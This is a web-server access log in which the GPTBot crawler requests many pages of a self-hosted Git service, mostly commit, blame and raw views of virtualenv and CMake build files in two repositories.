[Client 74.7.227.38] [Length 8496] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones" +[17/Feb/2026:15:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=leastcomplete&state=open" [Client 74.7.227.38] [Length 8490] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones" +[17/Feb/2026:15:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11218] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11215] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?language=HTML&q=&sort=recentupdate&tab=repositories" [Client 74.7.227.38] [Length 7778] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" +[17/Feb/2026:15:28:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json" +[17/Feb/2026:15:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 11551] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:28:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 11054] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 11075] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:28:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 11526] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 19881] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:28:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 11077] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:28:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 11521] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:28:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:28:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:28:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10185] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:28:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:15:28:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:15:28:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10182] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:28:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 10413] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:15:28:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:15:28:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3?display=source" [Client 74.7.227.38] [Length 11096] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:15:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 10414] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:15:28:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:15:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:15:28:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:15:28:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 9979] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:15:28:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 22427] [Gzip 11.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:15:28:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:15:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:15:28:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:15:28:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:15:28:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 11065] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:28:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 10420] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:15:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13514] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:28:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 11540] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 11564] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:28:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 12155] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx" [Client 74.7.227.38] [Length 11485] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:28:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 11550] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:28:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 11536] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:28:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13517] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 19892] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:15:28:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:15:28:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:15:29:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13251] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:15:29:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3" 